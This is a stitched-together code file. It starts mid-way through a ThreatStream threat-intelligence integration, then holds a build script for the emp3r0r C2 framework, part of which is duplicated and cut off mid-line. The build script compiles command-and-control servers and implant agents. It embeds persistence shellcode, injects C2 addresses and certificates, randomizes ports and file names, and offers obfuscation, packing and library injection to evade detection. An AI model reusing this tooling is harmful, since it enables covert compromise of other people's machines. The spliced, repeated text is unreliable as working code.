with id {id}' description = response.json() if model == 'signature': description = description.get('notes', '') elif model == 'tipreport': description = description.get('body', '') else: description = description.get('description', None) return fileResult(F"{model}_{id}.html", description.encode(encoding='UTF-8')) def get_iocs_by_model(client: Client, model, id, limit="20"): """ Returns list of indicators associated with specific Threat Model by model id. 
""" params = dict(limit=limit) model_type = model.title() response = client.http_request("GET", F"v1/{model}/{id}/intelligence/", params=params, resp_type='response') if response.status_code == 404: return f'No indicators found for Threat Model {model_type} with id {id}' iocs_list = response.json().get('objects', None) model_type = model.title() iocs_context = parse_indicators_list(iocs_list) outputs = { 'ModelType': model_type, 'ModelID': id, 'Indicators': iocs_context } readable_output = tableToMarkdown(f'Indicators list for Threat Model {model_type} with id {id}', iocs_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Model', outputs_key_field=['ModelID', 'ModelType'], outputs=outputs, readable_output=readable_output, raw_response=iocs_list ) def create_model(client: Client, model, name, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Creates Threat Model with basic parameters. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) model_id = client.http_request("POST", F"v1/{model}/", data=json.dumps(data)).get('id', None) if model_id: return get_iocs_by_model(client, model, model_id, limit="50") else: raise DemistoException(f'{model.title()} Threat Model was not created. Check the input parameters') def update_model(client: Client, model, model_id, name=None, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Updates a ThreatStream model with parameters. In case one or more optional parameters are defined, the previous data is overridden. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) client.http_request("PATCH", F"v1/{model}/{model_id}/", data=json.dumps(data)) return get_iocs_by_model(client, model, model_id, limit="50") def get_supported_platforms(client: Client, sandbox_type="default"): """ Returns list of supported platforms for premium sandbox or default sandbox. """ platform_data = client.http_request("GET", "v1/submit/parameters/") result_key = 'platform_choices' if sandbox_type == 'default' else 'premium_platform_choices' available_platforms = platform_data.get(result_key, []) if not available_platforms: return f'No supported platforms found for {sandbox_type} sandbox' output = camelize(available_platforms) outputs_prefix = 'DefaultPlatforms' if sandbox_type == 'default' else 'PremiumPlatforms' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{outputs_prefix}', outputs=output, readable_output=tableToMarkdown(f'Supported platforms for {sandbox_type} sandbox', output), raw_response=platform_data ) def get_submission_status(client: Client, report_id, output_as_command_result=True): """ Returns the sandbox submission status. If status is not received in report_info then status is set to done. Receives boolean flag that indicates if result should be as command result. By default the output boolean is set to True. 
""" response = client.http_request("GET", F"v1/submit/{report_id}/", resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report_info = response.json() status = report_info.get('status', "done") verdict = report_info.get('verdict', '').title() platform = report_info.get('platform', '') if output_as_command_result: report_outputs = {'ReportID': report_id, 'Status': status, 'Platform': platform, 'Verdict': verdict} readable_output = tableToMarkdown(f'The analysis status for id {report_id}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: return status, verdict def file_name_to_valid_string(file_name): """ Demoji the file name if it's contain emoji """ if emoji.emoji_count(file_name): # type: ignore return emoji.demojize(file_name) # type: ignore return file_name def submit_report(client: Client, submission_type, submission_value, submission_classification="private", report_platform="WINDOWS7", premium_sandbox="false", detail=None): """ Detonates URL or file that was uploaded to war room to ThreatStream sandbox. """ data = { 'report_radio-classification': submission_classification, 'report_radio-platform': report_platform, 'use_premium_sandbox': premium_sandbox, } if detail: data['detail'] = detail uploaded_file = None files = None if submission_type == 'file': # submission_value should be entry id of uploaded file in war room try: file_info = demisto.getFilePath(submission_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {submission_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') file_name = file_name_to_valid_string(file_info.get('name')) files = {'report_radio-file': (file_name, uploaded_file)} else: data['report_radio-url'] = submission_value submit_res = client.http_request("POST", "v1/submit/new/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() if argToBoolean(submit_res.get('success', 'false')): report_info = submit_res['reports'][report_platform] report_id = report_info['id'] report_status, _ = get_submission_status(client, report_id, False) report_outputs = {'ReportID': report_id, 'Status': report_status, 'Platform': report_platform} readable_output = tableToMarkdown(f'The submission info for {submission_value}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: raise DemistoException(f'The submission of {submission_value} failed') def get_report(client: Client, report_id): """ Returns the report from ThreatStream sandbox by id. 
""" response = client.http_request('GET', f'v1/submit/{report_id}/report', resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report = response.json() report_results = report.get('results', {}) if report_results: info = parse_info(report_results.get('info', {})) info['ReportID'] = report_id _, info['Verdict'] = get_submission_status(client, report_id, False) readable_output = tableToMarkdown(f'Report {report_id} analysis results', info) # ignore 'networks' from the readable output info['Network'] = parse_network_lists(report_results.get('network', {})) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=info, readable_output=readable_output, raw_response=report ) def add_tag_to_model(client: Client, model_id, tags, model="intelligence"): """ Adds tag to specific Threat Model. By default is set to intelligence (indicators). """ tags = argToList(tags) data = { 'tags': [{'name': t, 'tlp': 'red'} for t in tags] } res = client.http_request("POST", F"v1/{model}/{model_id}/tag/", data=json.dumps(data)) if argToBoolean(res.get('success', 'false')): return f'Added successfully tags: {tags} to {model} with {model_id}' else: raise DemistoException(f'Failed to add {tags} to {model} with {model_id}') def get_indicators(client: Client, **kwargs): """ Returns filtered indicators by parameters from ThreatStream. By default the limit of indicators result is set to 20. """ limit = kwargs['limit'] = int(kwargs.get('limit', 20)) offset = kwargs['offset'] = 0 url = "v2/intelligence/" if 'query' in kwargs: url += f"?{kwargs.pop('query')}" iocs_list = client.http_request("GET", url, params=kwargs).get('objects', None) if not iocs_list: return 'No indicators found from ThreatStream' iocs_context = parse_indicators_list(iocs_list) # handle the issue that the API does not return more than 1000 indicators. 
if limit > 1000: while len(iocs_context) < limit: offset += len(iocs_list) kwargs['limit'] = limit kwargs['offset'] = offset iocs_list = client.http_request("GET", "v2/intelligence/", params=kwargs).get('objects', None) if iocs_list: iocs_context.extend(parse_indicators_list(iocs_list)) else: break return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Indicators', outputs=iocs_context, readable_output=tableToMarkdown("The indicators results", iocs_context), raw_response=iocs_list ) def main(): """ Initiate integration command """ command = demisto.command() LOG(f'Command being called is {command}') params = demisto.params() # init credentials user_name = params.get('credentials', {}).get('identifier') api_key = params.get('credentials', {}).get('password') server_url = params.get('url', '').strip('/') reliability = params.get('integrationReliability', DBotScoreReliability.B) if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("Please provide a valid value for the Source Reliability parameter.") commands = { # reputation commands 'ip': ips_reputation_command, 'domain': domains_reputation_command, 'file': files_reputation_command, 'url': urls_reputation_command, 'threatstream-email-reputation': get_email_reputation, 'threatstream-import-indicator-with-approval': import_ioc_with_approval, 'threatstream-import-indicator-without-approval': import_ioc_without_approval, 'threatstream-get-analysis-status': get_submission_status, 'threatstream-get-passive-dns': get_passive_dns, 'threatstream-get-model-list': get_model_list, 'threatstream-get-model-description': get_model_description, 'threatstream-get-indicators-by-model': get_iocs_by_model, 'threatstream-get-indicators': get_indicators, 'threatstream-supported-platforms': get_supported_platforms, 'threatstream-analysis-report': get_report, 'threatstream-create-model': create_model, 'threatstream-update-model': update_model, 'threatstream-submit-to-sandbox': submit_report, 'threatstream-add-tag-to-model': add_tag_to_model, } try: client = Client( base_url=f'{server_url}/api/', user_name=user_name, api_key=api_key, verify=not params.get('insecure', False), proxy=params.get('proxy', False), reliability=reliability, should_create_relationships=params.get('create_relationships', True), ) args = prepare_args(demisto.args(), command, params) if command == 'test-module': result = test_module(client) elif command in REPUTATION_COMMANDS: result = commands[command](client, DBotScoreCalculator(params), **args) # type: ignore else: result = commands[command](client, **args) # type: ignore return_results(result) except Exception as err: return_error(f'{str(err)}, traceback {traceback.format_exc()}') # python2 uses __builtin__ python3 uses builtins if __name__ in ("builtins", "__builtin__", "__main__"): main()
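# --- Illustrative sketch (not part of the integration) ---
# A minimal example, under the default thresholds defined above
# (DEFAULT_MALICIOUS_THRESHOLD = 65, DEFAULT_SUSPICIOUS_THRESHOLD = 25), of how
# DBotScoreCalculator.calculate_score() resolves an indicator's confidence:
#   confidence 90 -> Common.DBotScore.BAD        (90 > 65)
#   confidence 40 -> Common.DBotScore.SUSPICIOUS (40 > 25)
#   confidence 10 -> Common.DBotScore.GOOD
# If an instance threshold (e.g. ip_threshold set to 50, a hypothetical value) or a
# command-level `threshold` argument is supplied, the result collapses to two levels:
# BAD when confidence >= threshold, GOOD otherwise.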
#!/usr/bin/env python3 # pylint: disable=invalid-name, too-many-branches, too-many-statements, broad-except, too-many-arguments, too-many-instance-attributes, line-too-long ''' this script replaces build.sh, coz bash/sed/awk is driving me insane ''' import argparse import atexit import glob import json import os import random import readline import shutil import subprocess import sys import tempfile import traceback import uuid class GoBuild: ''' all-in-one builder ''' def __init__(self, target="cc", cc_indicator="cc_indicator", cc_ip="[cc_ipaddr]", cc_other_names=""): self.target = target self.GOOS = os.getenv("GOOS") self.GOARCH = os.getenv("GOARCH") if self.GOOS is None: self.GOOS = "linux" if self.target == "agentw": self.GOOS = "windows" if self.GOARCH is None: self.GOARCH = "amd64" # CA self.CA = "" # tags self.CCIP = cc_ip self.CC_OTHER_NAMES = cc_other_names self.INDICATOR = cc_indicator self.UUID = str(uuid.uuid1()) self.VERSION = get_version() # webroot if 'webroot' in CACHED_CONF: self.WebRoot = CACHED_CONF['webroot'] else: self.WebRoot = str(uuid.uuid1()) CACHED_CONF['webroot'] = self.WebRoot # OpSep if 'opsep' in CACHED_CONF: self.OpSep = CACHED_CONF['opsep'] else: self.OpSep = str(uuid.uuid1()) CACHED_CONF['opsep'] = self.OpSep # pid file name if 'pid_file' in CACHED_CONF: self.PIDFile = CACHED_CONF['pid_file'] else: self.PIDFile = rand_str(random.randint(3, 10)) CACHED_CONF['pid_file'] = self.PIDFile # util path name if 'utils_path' in CACHED_CONF: self.UtilsPath = CACHED_CONF['utils_path'] else: self.UtilsPath = rand_str(random.randint(3, 10)) CACHED_CONF['utils_path'] = self.UtilsPath # socket name if 'socket' in CACHED_CONF: self.Socket = CACHED_CONF['socket'] else: self.Socket = rand_str(random.randint(3, 10)) CACHED_CONF['socket'] = self.Socket # indicator text if 'indicator_text' in CACHED_CONF: self.INDICATOR_TEXT = CACHED_CONF['indicator_text'] else: self.INDICATOR_TEXT = "emp3r0r" CACHED_CONF['indicator_text'] = self.INDICATOR_TEXT # agent root directory if "agent_root" in CACHED_CONF: self.AgentRoot = CACHED_CONF['agent_root'] else: # by default mkdir in current directory self.AgentRoot = f"{rand_str(random.randint(5, 10))}" CACHED_CONF['agent_root'] = self.AgentRoot # DoH if "doh_server" not in CACHED_CONF: CACHED_CONF['doh_server'] = "" # agent proxy if "agent_proxy" not in CACHED_CONF: CACHED_CONF['agent_proxy'] = "" # cdn proxy if "cdn_proxy" not in CACHED_CONF: CACHED_CONF['cdn_proxy'] = "" def build(self): ''' cd to cmd and run go build ''' self.gen_certs() # CA if 'ca' in CACHED_CONF: log_warn( f"Using cached CA cert ({CACHED_CONF["ca"]}),\nmake sure you have the coresponding keypair signed by it") self.CA = CACHED_CONF['ca'] else: f = open("./tls/rootCA.crt") self.CA = f.read() f.close() # cache CA, too CACHED_CONF['ca'] = self.CA # cache version CACHED_CONF['version'] = self.VERSION # write cached configs json_file = open(BUILD_JSON, "w+") json.dump(CACHED_CONF, json_file, indent=4) json_file.close() self.set_tags() # copy the server/cc keypair to ./build for later use if os.path.isdir("./tls"): log_warn("[*] Copying CC keypair to ./build") for f in glob.glob("./tls/emp3r0r-*pem"): print(f" Copy {f} to ./build") shutil.copy(f, "./build") try: os.chdir(f"./cmd/{self.target}") except BaseException: log_error(f"Cannot cd to cmd/{self.target}") return log_warn("GO BUILD starts...") build_target = f"../../build/{self.target}" if self.target == "agent": build_target = f"../../build/{self.target}-{self.UUID}" elif self.target == "agentw": build_target = 
f"../../build/{self.target}-{self.UUID}.exe" # go mod os.system('go mod tidy') cmd = f'''GOOS={self.GOOS} GOARCH={self.GOARCH} CGO_ENABLED=0''' + \ f""" go build -o {build_target} -ldflags='-s -w' -trimpath""" # garble if shutil.which("garble") and self.target != "cc" and args.garble: cmd = f'''GOOS={self.GOOS} GOARCH={self.GOARCH} CGO_ENABLED=0 GOPRIVATE=''' + \ f''' garble -literals -tiny build -o {build_target} -ldflags="-v" -trimpath .''' os.system(cmd) log_warn("GO BUILD ends...") os.chdir("../../") self.unset_tags() targetFile = f"./build/{build_target.split("/")[-1]}" if os.path.exists(targetFile): log_warn(f"{targetFile} generated") else: log_error("go build failed") sys.exit(1) # pack agent binary with packer if self.target == "agent" and args.pack: shutil.copy(targetFile, "../packer/agent") os.chdir("../packer") os.system("bash ./build.sh") os.system("CGO_ENABLED=0 ./cryptor.exe") shutil.move("agent.packed.exe", f"../core/{targetFile}") os.chdir("../core") os.chmod(targetFile, 0o755) log_warn(f"{targetFile} packed") def gen_certs(self): ''' generate server cert/key, and CA if necessary ''' if "ccip" in CACHED_CONF: if self.CCIP == CACHED_CONF['ccip'] and os.path.exists("./build/emp3r0r-key.pem"): return log_warn("[!] Generating new certs...") try: os.chdir("./tls") os.system( f"bash ./genkey-with-ip-san.sh {self.UUID} {self.UUID}.com {self.CCIP} {self.CC_OTHER_NAMES}") os.rename(f"./{self.UUID}-cert.pem", "./emp3r0r-cert.pem") os.rename(f"./{self.UUID}-key.pem", "./emp3r0r-key.pem") os.chdir("..") except BaseException as exc: log_error( f"[-] Something went wrong, see above for details: {exc}") sys.exit(1) def set_tags(self): ''' modify some tags in the source ''' # backup source file try: shutil.copy("./lib/tun/tls.go", "/tmp/tls.go") shutil.copy("./lib/tun/api.go", "/tmp/api.go") shutil.copy("./lib/data/def.go", "/tmp/def.go") except BaseException: log_error(f"Failed to backup source files:\n{traceback.format_exc()}") sys.exit(1) # version sed("./lib/data/def.go", '''Version = "[version_string]"''', f'''Version = "{self.VERSION}"''') if self.target == "agent": # guardian shellcode sed("./lib/data/def.go", "[persistence_shellcode]", CACHED_CONF['guardian_shellcode']) sed("./lib/data/def.go", "[persistence_agent_path]", CACHED_CONF['guardian_agent_path']) # CA sed("./lib/tun/tls.go", "[emp3r0r_ca]", self.CA) # webroot sed("./lib/tun/api.go", 'WebRoot = "emp3r0r"', f'WebRoot = "{self.WebRoot}"') # opsep sed("./lib/data/def.go", '''OpSep = "cb433bd1-354c-4802-a4fa-ece518f3ded1"''', f'''OpSep = "{self.OpSep}"''') # Socket name sed("./lib/data/def.go", '''SocketName = AgentRoot + "/.socket"''', f'''SocketName = AgentRoot + "/{self.Socket}"''') # utils path sed("./lib/data/def.go", '''UtilsPath = AgentRoot + "/bin"''', f'''UtilsPath = AgentRoot + "/{self.UtilsPath}"''') # PID file name sed("./lib/data/def.go", '''PIDFile = AgentRoot + "/.pid"''', f'''PIDFile = AgentRoot + "/{self.PIDFile}"''') # CC IP sed("./lib/data/def.go", "CCAddress = \"https://[cc_ipaddr]\"", f"CCAddress = \"https://{self.CCIP}\"") # agent root path sed("./lib/data/def.go", "AgentRoot = \"[agent_root]\"", f"AgentRoot = \"{self.AgentRoot}\"") # indicator sed("./lib/data/def.go", "CCIndicator = \"[cc_indicator]\"", f"CCIndicator = \"{self.INDICATOR}\"") # indicator wait if 'indicator_wait_min' in CACHED_CONF: sed("./lib/data/def.go", "IndicatorWaitMin = 30", f"IndicatorWaitMin = {CACHED_CONF["indicator_wait_min"]}") if 'indicator_wait_max' in CACHED_CONF: sed("./lib/data/def.go", "IndicatorWaitMax = 120", 
f"IndicatorWaitMax = {CACHED_CONF["indicator_wait_max"]}") # broadcast_interval if 'broadcast_interval_min' in CACHED_CONF: sed("./lib/data/def.go", "BroadcastIntervalMin = 30", f"BroadcastIntervalMin = {CACHED_CONF["broadcast_interval_min"]}") if 'broadcast_interval_max' in CACHED_CONF: sed("./lib/data/def.go", "BroadcastIntervalMax = 120", f"BroadcastIntervalMax = {CACHED_CONF["broadcast_interval_max"]}") # cc indicator text sed("./lib/data/def.go", "CCIndicatorText = \"[indicator_text]\"", f"CCIndicatorText = \"{self.INDICATOR_TEXT}\"") # agent UUID sed("./lib/data/def.go", "AgentUUID = \"[agent_uuid]\"", f"AgentUUID = \"{self.UUID}\"") # DoH sed("./lib/data/def.go", "DoHServer = \"\"", f"DoHServer = \"{CACHED_CONF["doh_server"]}\"") # CDN sed("./lib/data/def.go", "CDNProxy = \"\"", f"CDNProxy = \"{CACHED_CONF["cdn_proxy"]}\"") # Agent Proxy sed("./lib/data/def.go", "AgentProxy = \"\"", f"AgentProxy = \"{CACHED_CONF["agent_proxy"]}\"") # ports sed("./lib/data/def.go", "CCPort = \"[cc_port]\"", f"CCPort = \"{CACHED_CONF["cc_port"]}\"") sed("./lib/data/def.go", "SSHDPort = \"[sshd_port]\"", f"SSHDPort = \"{CACHED_CONF["sshd_port"]}\"") sed("./lib/data/def.go", "ProxyPort = \"[proxy_port]\"", f"ProxyPort = \"{CACHED_CONF["proxy_port"]}\"") sed("./lib/data/def.go", "BroadcastPort = \"[broadcast_port]\"", f"BroadcastPort = \"{CACHED_CONF["broadcast_port"]}\"") def unset_tags(self): # restore source files try: shutil.move("/tmp/def.go", "./lib/data/def.go") shutil.move("/tmp/tls.go", "./lib/tun/tls.go") shutil.move("/tmp/api.go", "./lib/tun/api.go") except BaseException: log_error(traceback.format_exc()) def clean(): ''' clean build output ''' to_rm = glob.glob("./tls/emp3r0r*") + glob.glob("./tls/openssl-*") + \ glob.glob("./build/*") + glob.glob("./tls/*.csr") for f in to_rm: try: # remove directories too if os.path.isdir(f): os.system(f"rm -rf {f}") else: # we don't need to delete the config file if f.endswith("build.json"): continue os.remove(f) print(" Deleted "+f) except BaseException: log_error(traceback.format_exc) def sed(path, old, new): ''' works like `sed -i s/old/new/g file` ''' rf = open(path) text = rf.read() to_write = text.replace(old, new) rf.close() f = open(path, "w") f.write(to_write) f.close() def yes_no(prompt): ''' y/n? 
''' if yes_to_all: log_warn(f"Choosing 'yes' for '{prompt}'") return True answ = input(prompt + " [Y/n] ").lower().strip() if answ in ["n", "no", "nah", "nay"]: return False return True def rand_str(length): ''' random string ''' uuidstr = str(uuid.uuid4()).replace('-', '') # we don't want the string to be long if length >= len(uuidstr): return uuidstr return uuidstr[:length] def main(target): ''' main main main ''' ccip = "" indicator = "" use_cached = False if target == "clean": clean() return # cc IP if "ccip" in CACHED_CONF: ccip = CACHED_CONF['ccip'] use_cached = yes_no(f"Use cached CC address ({ccip})?") if not use_cached: if yes_no("Clean everything and start over?"): clean() ccip = input( "CC server address (domain name or ip address, can be more than one, separate with space):\n> ").strip() CACHED_CONF['ccip'] = ccip if len(ccip.split()) > 1: CACHED_CONF['ccip'] = ccip.split()[0] if target == "cc": cc_other = "" if len(ccip.split()) > 1: cc_other = ' '.join(ccip[1:]) gobuild = GoBuild(target="cc", cc_ip=ccip, cc_other_names=cc_other) gobuild.build() return if target not in ("agent", "agentw"): print("Unknown target") return # indicator use_cached = False if "cc_indicator" in CACHED_CONF: indicator = CACHED_CONF['cc_indicator'] use_cached = yes_no(f"Use cached CC indicator ({indicator})?") if not use_cached: indicator = input( "CC status indicator URL (leave empty to disable): ").strip() CACHED_CONF['cc_indicator'] = indicator if CACHED_CONF['cc_indicator'] != "": # indicator text use_cached = False if "indicator_text" in CACHED_CONF: use_cached = yes_no( f"Use cached CC indicator text ({CACHED_CONF["indicator_text"]})?") if not use_cached: indicator_text = input( "CC status indicator text (leave empty to disable): ").strip() CACHED_CONF['indicator_text'] = indicator_text # Agent proxy use_cached = False if "agent_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached agent proxy ({CACHED_CONF["agent_proxy"]})?") if not use_cached: agentproxy = input( "Proxy server for agent (leave empty to disable): ").strip() CACHED_CONF['agent_proxy'] = agentproxy # CDN use_cached = False if "cdn_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached CDN server ({CACHED_CONF["cdn_proxy"]})?") if not use_cached: cdn = input("CDN websocket server (leave empty to disable): ").strip() CACHED_CONF['cdn_proxy'] = cdn # DoH use_cached = False if "doh_server" in CACHED_CONF: use_cached = yes_no( f"Use cached DoH server ({CACHED_CONF["doh_server"]})?") if not use_cached: doh = input("DNS over HTTP server (leave empty to disable): ").strip() CACHED_CONF['doh_server'] = doh # guardian shellcode path = f"/tmp/{next(tempfile._get_candidate_names())}" CACHED_CONF['guardian_shellcode'] = gen_guardian_shellcode(path) CACHED_CONF['guardian_agent_path'] = path # option to disable autoproxy and broadcasting if not yes_no("Use autoproxy (will enable UDP broadcasting)"): CACHED_CONF['broadcast_interval_max'] = 0 gobuild = GoBuild(target=target, cc_indicator=indicator, cc_ip=ccip) gobuild.build() def log_error(msg): ''' print in red ''' print("\u001b[31m"+msg+"\u001b[0m") def log_warn(msg): ''' print in yellow ''' print("\u001b[33m"+msg+"\u001b[0m") def save(prev_h_len, hfile): ''' append to histfile ''' new_h_len = readline.get_current_history_length() readline.set_history_length(1000) readline.append_history_file(new_h_len - prev_h_len, hfile) # JSON config file, cache some user data BUILD_JSON = "./build/build.json" CACHED_CONF = {} if os.path.exists(BUILD_JSON): try: jsonf = open(BUILD_JSON) CACHED_CONF = 
json.load(jsonf) jsonf.close() except BaseException: log_warn(traceback.format_exc()) def rand_port(): ''' returns a random int between 1024 and 65535 ''' return str(random.randint(1025, 65534)) def randomize_ports(): ''' randomize every port used by emp3r0r agent, cache them in build.json ''' if 'cc_port' not in CACHED_CONF: CACHED_CONF['cc_port'] = rand_port() if 'sshd_port' not in CACHED_CONF: CACHED_CONF['sshd_port'] = rand_port() if 'proxy_port' not in CACHED_CONF: CACHED_CONF['proxy_port'] = rand_port() if 'broadcast_port' not in CACHED_CONF: CACHED_CONF['broadcast_port'] = rand_port() def gen_guardian_shellcode(path): ''' ../shellcode/gen.py ''' if not shutil.which("nasm"): log_error("nasm not found") try: pwd = os.getcwd() os.chdir("../shellcode") out = subprocess.check_output(["python3", "gen.py", path]) os.chdir(pwd) shellcode = out.decode('utf-8') if "\\x48" not in shellcode: log_error("Failed to generate shellcode: "+out) return "N/A" except BaseException: log_error(traceback.format_exc()) return "N/A" return shellcode def get_version(): ''' print current version ''' try: check = "git describe --tags" out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except KeyboardInterrupt: return "Unknown" except BaseException: check = "git describe --always" try: out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except BaseException: try: versionf = open(".version") version = versionf.read().strip() versionf.close() return version except BaseException: return "Unknown" return out.decode("utf-8").strip() # command line args yes_to_all = False parser = argparse.ArgumentParser(description="Build emp3r0r CC/Agent bianaries") parser.add_argument('--target', type=str, required=True, help='Build target, can be cc/agent/agentw') parser.add_argument('--pack', action="store_true", required=False, help='Pack agent binary, only available under Linux, do not use with --dll') parser.add_argument('--dll', action="store_true", required=False, help='Load agent binary into any processes using shared library injection') parser.add_argument('--garble', action="store_true", required=False, help='Obfuscate agent binary with garble') parser.add_argument('--yes', action="store_true", required=False, help='Do not ask questions, take default answers') args = parser.parse_args() if args.yes: yes_to_all = True try: randomize_ports() if not os.path.exists("./build"): os.mkdir("./build") # support GNU readline interface, command history histfile = "./build/.build_py_history" try: readline.read_history_file(histfile) h_len = readline.get_current_history_length() except FileNotFoundError: open(histfile, 'wb').close() h_len = 0 atexit.register(save, h_len, histfile) main(args.target) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except BaseException: log_error(f"[!] Exception:\n{traceback.format_exc()}")
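# --- Illustrative usage (not part of the build script) ---
# A minimal sketch of typical invocations, assuming this file is saved as
# build.py (the ".build_py_history" histfile name above suggests that) and
# using only the flags defined by the argparse section:
#   python3 build.py --target cc                    # build the CC server
#   python3 build.py --target agent --garble --yes  # Linux agent, garble-obfuscated, no prompts
#   python3 build.py --target agentw                # Windows agent (forces GOOS=windows)
#   python3 build.py --target clean                 # remove ./build output and generated certs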
''' if yes_to_all: log_warn(f"Choosing 'yes' for '{prompt}'") return True answ = input(prompt + " [Y/n] ").lower().strip() if answ in ["n", "no", "nah", "nay"]: return False return True def rand_str(length): ''' random string ''' uuidstr = str(uuid.uuid4()).replace('-', '') # we don't want the string to be long if length >= len(uuidstr): return uuidstr return uuidstr[:length] def main(target): ''' main main main ''' ccip = "" indicator = "" use_cached = False if target == "clean": clean() return # cc IP if "ccip" in CACHED_CONF: ccip = CACHED_CONF['ccip'] use_cached = yes_no(f"Use cached CC address ({ccip})?") if not use_cached: if yes_no("Clean everything and start over?"): clean() ccip = input( "CC server address (domain name or ip address, can be more than one, separate with space):\n> ").strip() CACHED_CONF['ccip'] = ccip if len(ccip.split()) > 1: CACHED_CONF['ccip'] = ccip.split()[0] if target == "cc": cc_other = "" if len(ccip.split()) > 1: cc_other = ' '.join(ccip[1:]) gobuild = GoBuild(target="cc", cc_ip=ccip, cc_other_names=cc_other) gobuild.build() return if target not in ("agent", "agentw"): print("Unknown target") return # indicator use_cached = False if "cc_indicator" in CACHED_CONF: indicator = CACHED_CONF['cc_indicator'] use_cached = yes_no(f"Use cached CC indicator ({indicator})?") if not use_cached: indicator = input( "CC status indicator URL (leave empty to disable): ").strip() CACHED_CONF['cc_indicator'] = indicator if CACHED_CONF['cc_indicator'] != "": # indicator text use_cached = False if "indicator_text" in CACHED_CONF: use_cached = yes_no( f"Use cached CC indicator text ({CACHED_CONF['indicator_text']})?") if not use_cached: indicator_text = input( "CC status indicator text (leave empty to disable): ").strip() CACHED_CONF['indicator_text'] = indicator_text # Agent proxy use_cached = False if "agent_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached agent proxy ({CACHED_CONF['agent_proxy']})?") if not use_cached: agentproxy = input( "Proxy server for agent (leave empty to disable): ").strip() CACHED_CONF['agent_proxy'] = agentproxy # CDN use_cached = False if "cdn_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached CDN server ({CACHED_CONF['cdn_proxy']})?") if not use_cached: cdn = input("CDN websocket server (leave empty to disable): ").strip() CACHED_CONF['cdn_proxy'] = cdn # DoH use_cached = False if "doh_server" in CACHED_CONF: use_cached = yes_no( f"Use cached DoH server ({CACHED_CONF['doh_server']})?") if not use_cached: doh = input("DNS over HTTP server (leave empty to disable): ").strip() CACHED_CONF['doh_server'] = doh # guardian shellcode path = f"/tmp/{next(tempfile._get_candidate_names())}" CACHED_CONF['guardian_shellcode'] = gen_guardian_shellcode(path) CACHED_CONF['guardian_agent_path'] = path # option to disable autoproxy and broadcasting if not yes_no("Use autoproxy (will enable UDP broadcasting)"): CACHED_CONF['broadcast_interval_max'] = 0 gobuild = GoBuild(target=target, cc_indicator=indicator, cc_ip=ccip) gobuild.build() def log_error(msg): ''' print in red ''' print("\u001b[31m"+msg+"\u001b[0m") def log_warn(msg): ''' print in yellow ''' print("\u001b[33m"+msg+"\u001b[0m") def save(prev_h_len, hfile): ''' append to histfile ''' new_h_len = readline.get_current_history_length() readline.set_history_length(1000) readline.append_history_file(new_h_len - prev_h_len, hfile) # JSON config file, cache some user data BUILD_JSON = "./build/build.json" CACHED_CONF = {} if os.path.exists(BUILD_JSON): try: jsonf = open(BUILD_JSON) CACHED_CONF = 
json.load(jsonf) jsonf.close() except BaseException: log_warn(traceback.format_exc()) def rand_port(): ''' returns a random int between 1024 and 65535 ''' return str(random.randint(1025, 65534)) def randomize_ports(): ''' randomize every port used by emp3r0r agent, cache them in build.json ''' if 'cc_port' not in CACHED_CONF: CACHED_CONF['cc_port'] = rand_port() if 'sshd_port' not in CACHED_CONF: CACHED_CONF['sshd_port'] = rand_port() if 'proxy_port' not in CACHED_CONF: CACHED_CONF['proxy_port'] = rand_port() if 'broadcast_port' not in CACHED_CONF: CACHED_CONF['broadcast_port'] = rand_port() def gen_guardian_shellcode(path): ''' ../shellcode/gen.py ''' if not shutil.which("nasm"): log_error("nasm not found") try: pwd = os.getcwd() os.chdir("../shellcode") out = subprocess.check_output(["python3", "gen.py", path]) os.chdir(pwd) shellcode = out.decode('utf-8') if "\\x48" not in shellcode: log_error("Failed to generate shellcode: "+out) return "N/A" except BaseException: log_error(traceback.format_exc()) return "N/A" return shellcode def get_version(): ''' print current version ''' try: check = "git describe --tags" out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except KeyboardInterrupt: return "Unknown" except BaseException: check = "git describe --always" try: out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except BaseException: try: versionf = open(".version") version = versionf.read().strip() versionf.close() return version except BaseException: return "Unknown" return out.decode("utf-8").strip() # command line args yes_to_all = False parser = argparse.ArgumentParser(description="Build emp3r0r CC/Agent bianaries") parser.add_argument('--target', type=str, required=True, help='Build target, can be cc/agent/agentw') parser.add_argument('--pack', action="store_true", required=False, help='Pack agent binary, only available under Linux, do not use with --dll') parser.add_argument('--dll', action="store_true", required=False, help='Load agent binary into any processes using shared library injection') parser.add_argument('--garble', action="store_true", required=False, help='Obfuscate agent binary with garble') parser.add_argument('--yes', action="store_true", required=False, help='Do not ask questions, take default answers') args = parser.parse_args() if args.yes: yes_to_all = True try: randomize_ports() if not os.path.exists("./build"): os.mkdir("./build") # support GNU readline interface, command history histfile = "./build/.build_py_history" try: readline.read_history_file(histfile) h_len = readline.get_current_history_length() except FileNotFoundError: open(histfile, 'wb').close() h_len = 0 atexit.register(save, 